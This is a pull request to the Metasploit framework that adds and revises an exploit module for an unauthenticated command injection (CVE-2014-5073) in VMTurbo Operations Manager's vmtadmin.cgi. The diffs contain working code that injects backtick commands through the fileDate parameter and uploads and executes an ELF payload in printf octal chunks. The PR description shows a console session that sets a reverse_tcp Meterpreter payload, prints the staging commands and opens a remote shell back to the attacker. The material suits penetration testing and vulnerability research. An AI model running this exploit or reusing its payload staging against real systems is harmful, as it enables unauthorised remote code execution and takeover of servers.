### PR TITLE
Add VMTurbo Operations Manager 'vmtadmin.cgi' RCE module.

### DIFF
--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 
-  def execute_command(cmd, opts = {})
+  def execute_command(cmd, opts)
     begin
     res = send_request_cgi({
       'uri'    => '/cgi-bin/vmtadmin.cgi',
@@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # Handle single command shot
     if target.name =~ /CMD/
       cmd = payload.encoded
-      res = execute_command(cmd)
+      res = execute_command(cmd, {})
 
       unless res
         fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")

--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::EXE
 
   def initialize(info = {})
     super(update_info(info,
@@ -118,6 +119,16 @@ class Metasploit3 < Msf::Exploit::Remote
     vprint_status("Sent command #{cmd}")
   end
 
+  #
+  # generate_payload_exe doesn't respect module's platform unless it's Windows, or the user
+  # manually sets one. This method is a temp work-around.
+  #
+  def check_generate_payload_exe
+    if generate_payload_exe.nil?
+      fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF. Please manually set a payload.")
+    end
+  end
+
   def exploit
 
     # Handle single command shot
@@ -132,6 +143,8 @@ class Metasploit3 < Msf::Exploit::Remote
       print_status("#{peer} - Blind Exploitation - unknown exploitation state")
       return
     end
+
+    check_generate_payload_exe
 
     # Handle payload upload using CmdStager mixin
     execute_cmdstager({:flavor => :printf})

--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -122,7 +122,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
     file_name = "/tmp/#{rand_text_alphanumeric(4+rand(4))}"
 
-    File.open(file_name, 'wb') { |f| f.write(data) }
     unix_upload(file_name, data)
     register_file_for_cleanup(file_name)
 

--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -9,8 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::EXE
-  include Msf::Exploit::FileDropper
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -64,6 +63,8 @@ class Metasploit3 < Msf::Exploit::Remote
       ],
       'DefaultTarget'  => 1
       ))
+
+    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
   def check
@@ -98,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 
-  def request(cmd)
+  def execute_command(cmd, opts)
     begin
     res = send_request_cgi({
       'uri'    => '/cgi-bin/vmtadmin.cgi',
@@ -113,88 +114,16 @@ class Metasploit3 < Msf::Exploit::Remote
       vprint_error("#{peer} - Failed to connect to the web server")
       return nil
     end
+
     vprint_status("Sent command #{cmd}")
-    res
-  end
-
-
-  def unix_stager(data)
-
-    file_name = "/tmp/#{rand_text_alphanumeric(4+rand(4))}"
-
-    unix_upload(file_name, data)
-    register_file_for_cleanup(file_name)
-
-    request("/bin/chmod +x #{file_name}")
-    request("#{file_name}&")
-  end
-
-  def unix_upload(file_name, data, append=false)
-    # This file uploader is used as early stager and follows the core
-    # function _write_file_unix_shell() in lib/msf/core/post/file.rb
-
-    redirect = (append ? '>>' : '>')
-
-    # Short-circuit an empty string. The : builtin is part of posix
-    # standard and should theoretically exist everywhere.
-    if data.length == 0
-      request(": #{redirect} #{file_name}")
-      return
-    end
-
-    d = data.dup
-    d.force_encoding('binary') if d.respond_to? :force_encoding
-
-    chunks = []
-    command = nil
-    cmd_name = ''
-
-    # Conservative.
-    line_max = 512
-    # Leave plenty of room for the filename we're writing to and the
-    # command to echo it out
-    line_max -= file_name.length
-    line_max -= 64
-
-    command = %q(/usr/bin/printf 'CONTENTS')
-
-    # each byte will balloon up to 4 when we encode
-    # (A becomes \x41 or \101)
-    max = line_max / 4
-
-    i = 0
-    while i < d.length
-      slice = d.slice(i...(i + max))
-      chunks << Rex::Text.to_octal(slice)
-      i += max
-    end
-
-    print_status("Sending payload to #{file_name} writing #{d.length} bytes in #{chunks.length} chunks of #{chunks.first.length} bytes")
-
-    # The first command needs to use the provided redirection for either
-    # appending or truncating.
-    cmd = command.sub('CONTENTS') { chunks.shift }
-    request("#{cmd} #{redirect} '#{file_name}'")
-
-    # After creating/truncating or appending with the first command, we
-    # need to append from here on out.
-    chunks.each { |chunk|
-      vprint_status("Next chunk is #{chunk.length} bytes")
-      cmd = command.sub('CONTENTS') { chunk }
-
-      request("#{cmd} >> '#{file_name}'")
-    }
-    true
   end
 
   def exploit
 
-    #
     # Handle single command shot
-    #
     if target.name =~ /CMD/
       cmd = payload.encoded
-      res = request(cmd)
+      res = execute_command(cmd)
 
       unless res
         fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")
@@ -204,13 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     end
 
-    @pl = generate_payload_exe
-
-    unless @pl
-      fail_with(Failure::BadConfig, "#{peer} - Please set payload before to run exploit.")
-      return
-    end
-
-    unix_stager(@pl)
+    # Handle payload upload using CmdStager mixin
+    execute_cmdstager({:flavor => :printf})
   end
 end

--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -84,9 +84,9 @@ class Metasploit3 < Msf::Exploit::Remote
     version = $2
     build = $1
 
-    print_status("#{peer} - VMTurbo Operations Manager version #{version} build #{build} detected")
+    vprint_status("#{peer} - VMTurbo Operations Manager version #{version} build #{build} detected")
     else
-      print_status("#{peer} - Unexpected vmtadmin.cgi response")
+      vprint_status("#{peer} - Unexpected vmtadmin.cgi response")
       return Exploit::CheckCode::Unknown
     end
 

--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -26,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'      =>
         [
-          'Emilio Pinna, Secunia Research <emilio.pinn@gmail.com>', # Vulnerability discovery and Metasploit module
+          # Secunia Research - Discovery and Metasploit module
+          'Emilio Pinna <emilio.pinn[at]gmail.com>'
         ],
       'License'     => MSF_LICENSE,
       'References'  =>

--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -1,0 +1,222 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'VMTurbo Operations Manager 4.6 vmtadmin.cgi Remote Command Execution',
+      'Description' => %q{
+          VMTurbo Operations Manager 4.6 and prior are vulnerable to unauthenticated
+          OS Command injection in the web interface. Use reverse payloads for the most
+          reliable results. Since it is a blind OS command injection vulnerability,
+          there is no output for the executed command when using the cmd generic payload.
+          Port binding payloads are disregarded due to the restrictive firewall settings.
+
+          This module has been tested successfully on VMTurbo Operations Manager 4.5 and
+          VMTurbo Operations Manager 4.6.
+      },
+      'Author'      =>
+        [
+          'Emilio Pinna, Secunia Research <emilio.pinn@gmail.com>', # Vulnerability discovery and Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+            ['CVE', '2014-5073'],
+            ['OSVDB', '109572'],
+            ['URL', 'http://secunia.com/secunia_research/2014-8/']
+        ],
+      'DisclosureDate' => 'Jun 25 2014',
+      'Privileged'     => false,
+      'Platform'       => %w{ linux unix },
+      'Payload'        =>
+        {
+          'Compat'   =>
+          {
+            'ConnectionType' => '-bind'
+          }
+        },
+      'Targets'        =>
+      [
+        [ 'Unix CMD',
+          {
+            'Arch' => ARCH_CMD,
+            'Platform' => 'unix'
+          }
+        ],
+        [ 'VMTurbo Operations Manager',
+          {
+          'Arch' => [ ARCH_X86, ARCH_X86_64 ],
+          'Platform' => 'linux'
+          }
+        ],
+      ],
+      'DefaultTarget'  => 1
+      ))
+  end
+
+  def check
+  begin
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => "/cgi-bin/vmtadmin.cgi",
+      'vars_get' => {
+        "callType" => "ACTION",
+        "actionType" => "VERSIONS"
+      }
+    })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      print_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      return Exploit::CheckCode::Unknown
+  end
+
+  if res and res.code == 200 and res.body =~ /vmtbuild:([\d]+),vmtrelease:([\d.]+),vmtbits:[\d]+,osbits:[\d]+/
+    version = $2
+    build = $1
+
+    print_status("#{peer} - VMTurbo Operations Manager version #{version} build #{build} detected")
+    else
+      print_status("#{peer} - Unexpected vmtadmin.cgi response")
+      return Exploit::CheckCode::Unknown
+    end
+
+    if version and version <= "4.6"
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def request(cmd)
+    begin
+    res = send_request_cgi({
+      'uri'    => '/cgi-bin/vmtadmin.cgi',
+      'method' => 'GET',
+      'vars_get' => {
+        "callType" => "DOWN",
+        "actionType" => "CFGBACKUP",
+        "fileDate" => "\"`#{cmd}`\""
+      }
+    })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      print_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      return nil
+    end
+    vprint_status("Sent command #{cmd}")
+    res
+  end
+
+
+  def unix_stager(data)
+
+    file_name = "/tmp/#{rand_text_alphanumeric(4+rand(4))}"
+
+    File.open(file_name, 'wb') { |f| f.write(data) }
+    unix_upload(file_name, data)
+    @to_delete = file_name
+
+    request("/bin/chmod +x #{file_name}")
+    request("#{file_name}&")
+  end
+
+  def unix_upload(file_name, data, append=false)
+    # This file uploader is used as early stager and follows the core
+    # function _write_file_unix_shell() in lib/msf/core/post/file.rb
+
+    redirect = (append ? '>>' : '>')
+
+    # Short-circuit an empty string. The : builtin is part of posix
+    # standard and should theoretically exist everywhere.
+    if data.length == 0
+      request(": #{redirect} #{file_name}")
+      return
+    end
+
+    d = data.dup
+    d.force_encoding('binary') if d.respond_to? :force_encoding
+
+    chunks = []
+    command = nil
+    cmd_name = ''
+
+    # Conservative.
+    line_max = 512
+    # Leave plenty of room for the filename we're writing to and the
+    # command to echo it out
+    line_max -= file_name.length
+    line_max -= 64
+
+    command = %q(/usr/bin/printf 'CONTENTS')
+
+    # each byte will balloon up to 4 when we encode
+    # (A becomes \x41 or \101)
+    max = line_max / 4
+
+    i = 0
+    while i < d.length
+      slice = d.slice(i...(i + max))
+      chunks << Rex::Text.to_octal(slice)
+      i += max
+    end
+
+    print_status("Sending payload to #{file_name} writing #{d.length} bytes in #{chunks.length} chunks of #{chunks.first.length} bytes")
+
+    # The first command needs to use the provided redirection for either
+    # appending or truncating.
+    cmd = command.sub('CONTENTS') { chunks.shift }
+    request("#{cmd} #{redirect} '#{file_name}'")
+
+    # After creating/truncating or appending with the first command, we
+    # need to append from here on out.
+    chunks.each { |chunk|
+      vprint_status("Next chunk is #{chunk.length} bytes")
+      cmd = command.sub('CONTENTS') { chunk }
+
+      request("#{cmd} >> '#{file_name}'")
+    }
+    true
+  end
+
+  def exploit
+
+    #
+    # Handle single command shot
+    #
+    if target.name =~ /CMD/
+      cmd = payload.encoded
+      res = request(cmd)
+
+      unless res
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+      end
+
+      print_status("#{rhost}:#{rport} - Blind Exploitation - unknown exploitation state")
+      return
+    end
+
+    @pl = generate_payload_exe
+
+    unless @pl
+      fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Please set payload before to run exploit.")
+      return
+    end
+
+    unix_stager(@pl)
+  end
+
+  def on_new_session(client)
+    return unless defined? @to_delete
+
+    print_warning("Deleting #{@to_delete} payload file")
+    request("/bin/rm #{@to_delete}")
+  end
+end

--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 
-  def execute_command(cmd, opts)
+  def execute_command(cmd, opts = {})
     begin
     res = send_request_cgi({
       'uri'    => '/cgi-bin/vmtadmin.cgi',

--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
       return Exploit::CheckCode::Unknown
     end
 
-    if version and version <= "4.6"
+    if version and version <= "4.6" and build < "28657"
       return Exploit::CheckCode::Appears
     else
       return Exploit::CheckCode::Safe

--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      vprint_error("#{peer} - Failed to connect to the web server")
       return Exploit::CheckCode::Unknown
   end
 
@@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      vprint_error("#{peer} - Failed to connect to the web server")
       return nil
     end
     vprint_status("Sent command #{cmd}")
@@ -197,17 +197,17 @@ class Metasploit3 < Msf::Exploit::Remote
       res = request(cmd)
 
       unless res
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+        fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")
       end
 
-      print_status("#{rhost}:#{rport} - Blind Exploitation - unknown exploitation state")
+      print_status("#{peer} - Blind Exploitation - unknown exploitation state")
       return
     end
 
     @pl = generate_payload_exe
 
     unless @pl
-      fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Please set payload before to run exploit.")
+      fail_with(Failure::BadConfig, "#{peer} - Please set payload before to run exploit.")
       return
     end
 

--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -22,8 +22,8 @@ class Metasploit3 < Msf::Exploit::Remote
           there is no output for the executed command when using the cmd generic payload.
           Port binding payloads are disregarded due to the restrictive firewall settings.
 
-          This module has been tested successfully on VMTurbo Operations Manager 4.5 and
-          VMTurbo Operations Manager 4.6.
+          This module has been tested successfully on VMTurbo Operations Manager versions 4.5 and
+          4.6.
       },
       'Author'      =>
         [

--- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
+++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
@@ -10,6 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(update_info(info,
@@ -123,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     File.open(file_name, 'wb') { |f| f.write(data) }
     unix_upload(file_name, data)
-    @to_delete = file_name
+    register_file_for_cleanup(file_name)
 
     request("/bin/chmod +x #{file_name}")
     request("#{file_name}&")
@@ -212,12 +213,5 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     unix_stager(@pl)
-  end
-
-  def on_new_session(client)
-    return unless defined? @to_delete
-
-    print_warning("Deleting #{@to_delete} payload file")
-    request("/bin/rm #{@to_delete}")
   end
 end


### PR DESCRIPTION
This module exploits a RCE vulnerability in 'cgi-bin/vmtadmin.cgi' to execute arbitrary commands
and spawn meterpreter/shell sessions.  
- Homepage: http://vmturbo.com/
- Tested on: VMTurbo Operations Manager Virtual Appliance versions 4.5 and 4.6
### Usage:
- Download VMTurbo Operation Manager Virtual Appliance
- The web interface asks for a free licence (can be required on the product website), but should be vulnerable also if not already activated 
- Run module
### Example verbose output

```
msf exploit(vmturbo_vmtadmin_exec_noauth) > set rhost 192.168.1.190
rhost => 192.168.1.190
msf exploit(vmturbo_vmtadmin_exec_noauth) > set lhost 192.168.1.253
lhost => 192.168.1.253
msf exploit(vmturbo_vmtadmin_exec_noauth) > set payload linux/x86/meterpreter/reverse_tcp 
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(vmturbo_vmtadmin_exec_noauth) > set verbose true
verbose => true
msf exploit(vmturbo_vmtadmin_exec_noauth) > run

[*] Started reverse handler on 192.168.1.253:4444 
[*] Writing 155 bytes in 2 chunks of 286 bytes to /tmp/ZHNg7
[*] Sent command /usr/bin/printf '\177\105\114\106\1\1\1\0\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\124\200\4\10\64\0\0\0\0\0\0\0\0\0\0\0\64\0\40\0\1\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\200\4\10\0\200\4\10\233\0\0\0\342\0\0\0\7\0\0\0\0\20\0\0\61\333\367\343\123\103\123\152\2\260\146\211\341\315\200\227\133\150\300\250\1\375\150\2\0' > '/tmp/ZHNg7'
[*] Next chunk is 169 bytes
[*] Sent command /usr/bin/printf '\21\134\211\341\152\146\130\120\121\127\211\341\103\315\200\262\7\271\0\20\0\0\211\343\301\353\14\301\343\14\260\175\315\200\133\211\341\231\266\14\260\3\315\200\377\341' >> '/tmp/ZHNg7'
[*] Sent command /bin/chmod +x /tmp/ZHNg7
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 192.168.1.190
[*] Sent command /tmp/ZHNg7&
[*] Meterpreter session 2 opened (192.168.1.253:4444 -> 192.168.1.190:59886) at 2014-08-11 16:02:02 +0200
[!] Deleting /tmp/ZHNg7 payload file
[*] Sent command /bin/rm /tmp/ZHNg7

meterpreter > sysinfo 
Computer     : vmturbo
OS           : Linux vmturbo 3.7.10-1.28-default #1 SMP Mon Feb 3 14:11:15 UTC 2014 (c9a2c6c) (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter >
```
### Example standard output

```
msf exploit(vmturbo_vmtadmin_exec_noauth) > run

[*] Started reverse handler on 192.168.1.253:4444 
[*] Sending payload to /tmp/SiCk writing 155 bytes in 2 chunks of 286 bytes
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 192.168.1.190
[*] Meterpreter session 1 opened (192.168.1.253:4444 -> 192.168.1.190:41456) at 2014-08-11 16:32:49 +0200
[!] Deleting /tmp/SiCk payload file

meterpreter > 
```
